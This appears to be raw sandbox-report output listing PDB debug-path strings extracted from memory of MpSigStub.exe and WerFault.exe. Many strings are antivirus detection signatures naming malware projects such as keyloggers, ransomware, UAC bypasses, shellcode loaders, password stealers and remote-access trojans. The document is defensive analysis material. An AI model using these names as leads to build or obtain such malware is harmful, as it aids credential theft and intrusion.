Source: Binary string: .+:\\src\\tcrypt\\Release\\s_(high|low).pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source: Binary string: c:\projects\cuspidPowershell\cuspid\EmbeddedDlls\AMSIFinder\AMSIFinder\obj\Release\AMSIFinder.pdb source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-io-l1-1-0.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source: Binary string: WanNengWB\WBUpd32.pdb source: MpSigStub.exe, 00000024.00000003.6319165087.00000197A48CC000.00000004.00000001.sdmp
Source: Binary string: CryptoService.pdb source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp
Source: Binary string: msasn1.pdb source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp
Source: Binary string: ,\NetGuy_Explorer\Release\NetGuy_Explorer.pdb source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source: Binary string: \TMain\Release\TSvr.pdb source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp
Source: Binary string: ,T:\TFS-TradeProject\PDB\Release\TT-Miner.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source: Binary string: L%D:\\MyCode\\riot.?\\encryptor.+\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: \SearchProtect\bin\Release\HPNotify.pdb source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp
Source: Binary string: Bou3asba\obj\Release\Danao.pdb source: MpSigStub.exe, 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000005.00000003.2855689224.000000000292F000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2962036020.00000000051D2000.00000004.00000040.sdmp
Source: Binary string: c:\RPCInstall\Release\RPCInstall.pdb source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp
Source: Binary string: wkernel32.pdb0 source: WerFault.exe, 00000009.00000003.2962036020.00000000051D2000.00000004.00000040.sdmp
Source: Binary string: Release DlpHook\Proxy.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source: Binary string: $\SuperLight\release\MfcDllServer.pdba source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source: Binary string: \Sample\Release\CNetworking.pdb source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp
Source: Binary string: $\Season\Wife_low\531\Quart\table.pdb source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp
Source: Binary string: 2Projects\VerifyAndLaunch\release\GCO Bootstrap.pdb source: MpSigStub.exe, 00000024.00000003.6328862944.00000197A3361000.00000004.00000001.sdmp
Source: Binary string: MC:\Users\wizzlabs\source\repos\ConsoleMap\ConsoleMap\obj\Release\Ehssassi.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source: Binary string: \BypassUac\branches\Download\build\Release\service.pdb source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp
Source: Binary string: OC:\Users\hoogle168\Desktop\2008Projects\NewCoreCtrl08\Release\NewCoreCtrl08.pdb source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source: Binary string: \CRP\Release\Mount.pdbaD source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp
Source: Binary string: :Release\haozip.chs\bin\Win32\release\pdb\HaoZip7zSetup.pdb source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp
Source: Binary string: \Release\MyEncrypter2.pdb source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp
Source: Binary string: 7h4qMQ1edvEOY+wQIOdVR_v.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: c:\dev\torntv\Release\TornTVApp.pdb source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp
Source: Binary string: winlogon.PDB source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: K8MiniPage.pdbx source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp
Source: Binary string: \RUNPCH\Release\GUO_CAU.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source: Binary string: 0.pdb source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp
Source: Binary string: \bundler\Production\bundler.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source: Binary string: wkernel32.pdbz~ source: WerFault.exe, 00000005.00000003.2881791538.00000000049A2000.00000004.00000040.sdmp
Source: Binary string: api-ms-win-core-shlwapi-obsolete-l1-1-0.pdb source: MpSigStub.exe, 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp
Source: Binary string: D:\C++\AsusShellCode\Release\AsusShellCode.pdb source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp
Source: Binary string: R,\\fishmaster\\x64\\Release\\fishmaster\.pdb source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdbx source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp
Source: Binary string: costura.injectordll.pdb source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp
Source: Binary string: [H:\My Data\My Source Code\Microsoft Office 2010\AutoKMS\AutoKMS\obj\x86\Release\AutoKMS.pdb source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp
Source: Binary string: mpengine.pdbOGPS source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp
Source: Binary string: A .+\\WormWin32 Poenon.+\\.+.pdb source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp
Source: Binary string: f:\project_2008\Fileman_candle_kgrid\Filebus\Bin\UpdateWindow.pdb source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp
Source: Binary string: wRHWRH@4hjethwehgw.pdb source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp
Source: Binary string: unknowndll.pdba~ source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source: Binary string: \fiDarSayebni.pdb source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp
Source: Binary string: IperiusRDPClient.pdb source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp
Source: Binary string: %KMS Client\bin\Release\KMS Client.pdba} source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source: Binary string: S\ccnet\Publish_Client\work\src\mainapp\Abacus.LaunchMail\bin\Release\LaunchMail.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\attrib\objfre\i386\attrib.pdbP& source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp
Source: Binary string: wajam_goblin.pdb source: MpSigStub.exe, 00000024.00000003.6342578169.00000197A421C000.00000004.00000001.sdmp
Source: Binary string: C:\SuccWare\SuccWare\obj\Debug\SuccWare.pdb source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp
Source: Binary string: \\qbot_debugger\\.+\\qbot_debugger\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdb( source: WerFault.exe, 00000005.00000003.2859654211.00000000054E7000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2926621250.0000000006131000.00000004.00000001.sdmp
Source: Binary string: joy.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source: Binary string: d:\av\common_main.obj.x86chk\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\twunk_16\objchk\i386\twunk_16.pdb source: MpSigStub.exe, 00000024.00000003.6344346071.00000197A30DC000.00000004.00000001.sdmp
Source: Binary string: MsiDatabaseMerge.pdb source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp
Source: Binary string: WebBrowserPassView.pdb source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp
Source: Binary string: msimg32.pdb source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp
Source: Binary string: E:\Work\SaveVid\Savevid-WS-Trunk\InstallCore\rbin\soffer.pdb source: MpSigStub.exe, 00000024.00000003.6306392748.00000197A44CA000.00000004.00000001.sdmp
Source: Binary string: GCWYq1g.pdb source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp
Source: Binary string: mfcsubs.pdb source: MpSigStub.exe, 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp
Source: Binary string: Release\NtdsAudit.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: netsh.pdbj source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: mshta.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source: Binary string: BTR.pdbGCTL source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp
Source: Binary string: PROZIPPER.pdb source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp
Source: Binary string: D:\developement\projects\flood_load\Release\flood_load.pdb source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp
Source: Binary string: sfxrar32\Release\sfxrar.pdbxB source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp
Source: Binary string: \\win\\build\\src\\build\\Release\\chrome_frame_helper\.exe\.pdb source: MpSigStub.exe, 00000024.00000003.6298561221.00000197A4380000.00000004.00000001.sdmp
Source: Binary string: wkernelbase.pdbz~ source: WerFault.exe, 00000005.00000003.2881791538.00000000049A2000.00000004.00000040.sdmp
Source: Binary string: ddraw.pdb source: MpSigStub.exe, 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp
Source: Binary string: GPDFDocument.pdb source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp
Source: Binary string: wbadmin.pdb source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp
Source: Binary string: *\ClientPlugin\obj\Release\ClientPlugin.pdb source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp
Source: Binary string: Unite.pdb source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp
Source: Binary string: \Release\WCmouiTri.pdb] source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp
Source: Binary string: \MailClient\Release\MailClient.pdb source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp
Source: Binary string: :FreeDownloadmanager\obj\x86\Debug\FreeDownloadManager.pdbx source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp
Source: Binary string: L%D:\\MyCode\\riot.?\\decryptor.+\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\w32tm\objfre\i386\w32tm.pdb source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp
Source: Binary string: Flipopia.pdb source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp
Source: Binary string: \Ozrenko\Documents\Work\Interstat2\Interstat2\Weather\Interstat.pdb source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp
Source: Binary string: Downloads\notepad-master\Release\notepad.pdb source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp
Source: Binary string: AdFind\Release\AdFind.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source: Binary string: d:\young\swprojects\tdxin\bin\amd64\rtdxftex_amd64.pdb source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp
Source: Binary string: nethtsrv.pdb source: MpSigStub.exe, 00000024.00000003.6276556833.00000197A3CCB000.00000004.00000001.sdmp
Source: Binary string: \Black Coding\RAT+BOT\WebServer 2.0\src\Release\WebServer.pdb source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp
Source: Binary string: S*\\server\\V.*\\Release\\PhantomNet.*\.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source: Binary string: \PCHunter64.pdb source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp
Source: Binary string: Release\toolbar_setup.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdbxc source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp
Source: Binary string: rasautou.pdb source: MpSigStub.exe, 00000024.00000003.6279246359.00000197A4A35000.00000004.00000001.sdmp
Source: Binary string: \obj\Release\PersistenceModule.pdb source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp
Source: Binary string: ?ExtractedBundle\RTM_ImageModRec_1.1.5.0_x64\RTM_ImageModRec.pdbac source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp
Source: Binary string: ?E:\hhu\TeamViewer_13.bjbj\BuildTarget\Release2017\tv_w32dll.pdb source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp
Source: Binary string: \i386\lanmandrv.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: \Release\corsar.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source: Binary string: c:\divide\broad\Hole\DoThird.pdb source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp
Source: Binary string: e:\updatecheck\UpdateCheck\release\UpdateCheck.pdb source: MpSigStub.exe, 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp
Source: Binary string: XBundlerTlsHelper.pdb source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp
Source: Binary string: UqxIkBeNYhKR.pdb source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source: Binary string: e:\src\fcrypt\Release\S\s_high.pdb source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp
Source: Binary string: e:\builddata\Install\source\Min_Loader-BuildAndDeploy\Release\Loader_Resized.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: tdc.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source: Binary string: mpg2splt.pdb source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp
Source: Binary string: obj\Release\FlashPlayerApp.pdb source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp
Source: Binary string: dxtrans.pdb source: MpSigStub.exe, 00000024.00000003.6270214588.00000197A4657000.00000004.00000001.sdmp
Source: Binary string: c:\supply\trouble\Classwho.pdb source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source: Binary string: \Microsoft Windows Search.pdb source: MpSigStub.exe, 00000024.00000003.6292407063.00000197A4EC4000.00000004.00000001.sdmp
Source: Binary string: termsrv.pdb source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp
Source: Binary string: KF.+:\\Projects\\C#\\Sayad\\Source\\Client\\bin\\x86\\Debug\\Client.pdb source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp
Source: Binary string: AntiMalware_Pro.pdb source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp
Source: Binary string: fc.pdb0 source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp
Source: Binary string: \Gleaned\purecall\win32p6.pdb source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp
Source: Binary string: Slb.EP.Shell.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source: Binary string: E@.+:\\Projects\\tidynet\\Release\\(selfdestruct|tidynetwork).pdb source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp
Source: Binary string: EFRE65.pdb source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp
Source: Binary string: !#HSTR:PossiblyClean:magottei.pdb.A source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp
Source: Binary string: C>s:\\dEVELOPMdNT\\dC\+\+dCdyptordEvoldtiod_dld\\release\\m.pdb source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp
Source: Binary string: lIFdrGkmBePss.pdb source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source: Binary string: CryARr.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: FreeDownloadmanager\obj\x86\Debug\FreeDownloadManager.pdb source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp
Source: Binary string: KSLDriver.pdbGCTL source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp
Source: Binary string: boteg.pdbxL source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: zYAamTGB2rfW!Cp+aR.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: D:\program z visuala\keylogger\Release\keylogger.pdb source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp
Source: Binary string: \GetWinPsw.pdb source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp
Source: Binary string: \\WOO\\HT\\HT Server\\.+\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: SAVService.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source: Binary string: \bin\winfdmscheme.pdb source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source: Binary string: zC:\Users\EchoHackCmd\source\repos\Minecraft_DLL_Injector\Minecraft_DLL_Injector\obj\x64\Release\Minecraft_DLL_Injector.pdb source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp
Source: Binary string: 7laIR+|.XJ5aA0aa.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: wevtutil.pdb source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp
Source: Binary string: C:\\Users\\Lucca\\AppData\\Local\\Temp\\.*\.pdb source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp
Source: Binary string: \isn.pdb source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp
Source: Binary string: Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp
Source: Binary string: \Ransomware2.0.pdb source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp
Source: Binary string: ToolbarCore\toolbar\ie\src\toolbar\wrapper\Release\externalwrapper.pdbx source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp
Source: Binary string: C:\\Users\\john\\Documents\\Visual Studio 2008\\Projects\\EncryptFile.*\\.*\\EncryptFile.exe.pdb source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb( source: WerFault.exe, 00000005.00000003.2857096900.0000000005434000.00000004.00000001.sdmp
Source: Binary string: \DownloaderMain\DownloaderDll.pdb source: MpSigStub.exe, 00000024.00000003.6326497821.00000197A3203000.00000004.00000001.sdmp
Source: Binary string: \rANSOM\rANSOM\obj\Sanyasteakler\rANSOM.pdb source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp
Source: Binary string: \Visual Studio 2010\Projects\installer4\installer\obj\x86\Release\installer.pdbxx source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: megasync.pdb source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp
Source: Binary string: \\wininet_fr_20200212\\.+\\?dlln\.pdb source: MpSigStub.exe, 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp
Source: Binary string: msoert2.pdb3 source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp
Source: Binary string: (vbsedit_source\x64\Release\mywscript.pdb source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp
Source: Binary string: csgoInjector.pdb source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp
Source: Binary string: vga256.pdb source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp
Source: Binary string: \output\MinSizeRel\updrem.pdb] source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp
Source: Binary string: kernel32.pdb source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp
Source: Binary string: x:\Dev_CPP\Work\VS_KnzStr_Adware\Release\VS_Work1.pdbx source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp
Source: Binary string: \\WOO\\HT\\.+Server.+\.pdb source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\ncpa\objfre\i386\ncpa.pdb0 source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp
Source: Binary string: winscard.pdb source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp
Source: Binary string: stscast.pdb source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp
Source: Binary string: m:\VP\QM\trunk\output\Recorder.pdb source: MpSigStub.exe, 00000024.00000003.6276556833.00000197A3CCB000.00000004.00000001.sdmp
Source: Binary string: bin\Release\LiveUpdateWPP.pdbxd source: MpSigStub.exe, 00000024.00000003.6306392748.00000197A44CA000.00000004.00000001.sdmp
Source: Binary string: ^shell\BATLE_SOURCE\SampleService_run_shellcode_from-memory10-02-2016\Release\SampleService.pdb source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp
Source: Binary string: \Visual Studio 2010\Projects\installer4\installer\obj\x86\Release\installer.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: \InstallGoogleToolBar\InstallGoogleToolBar\obj\Debug\InstallGoogleToolBar.pdb source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp
Source: Binary string: \Release\shellcode.pdb source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb( source: WerFault.exe, 00000005.00000003.2857984455.000000000543A000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2918468716.00000000030C6000.00000004.00000001.sdmp
Source: Binary string: \Current\wear.pdb source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp
Source: Binary string: PCSUQuickScan.pdb source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp
Source: Binary string: hWEHW#@HJERKJERJER^$.Pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: e:\caoe.PDBa source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source: Binary string: \yacdl\Release\yacdl.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source: Binary string: Krypton\source\repos\UAC\UAC\obj\Release\UAC.pdb source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp
Source: Binary string: mpengine.pdb source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb( source: WerFault.exe, 00000009.00000003.2920056243.00000000030D7000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb* source: WerFault.exe, 00000009.00000003.2962082422.00000000051D9000.00000004.00000040.sdmp
Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp
Source: Binary string: XrfZPp2C.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: UsoCoreWorker.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source: Binary string: _sa\bin\Release\ClientSAHook.pdb source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp
Source: Binary string: w:\work\vcprj\prj\downloader\Release\injdldr.pdb source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp
Source: Binary string: c:\To\In\All\With\Within\Value.pdb source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp
Source: Binary string: security.pdb source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\w32tm\objfre\i386\w32tm.pdb0 source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp
Source: Binary string: \\MoonRat_Develop\\.+\\obj\\Release\\.+\.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source: Binary string: \bin\Release.Minimal\officer.pdb source: MpSigStub.exe, 00000024.00000003.6296880704.00000197A4AB8000.00000004.00000001.sdmp
Source: Binary string: C:\src\similar\clients\our\new_bundler\nsis_plugins\plugins\safed.pdb source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp
Source: Binary string: unknowndll.pdbaT source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp
Source: Binary string: LiuLiangBao\Release\LiuLiangBao.pdb source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp
Source: Binary string: \InstallerMainV6_Yrrehs\Release\Main.pdb source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp
Source: Binary string: adptif.pdb3 source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp
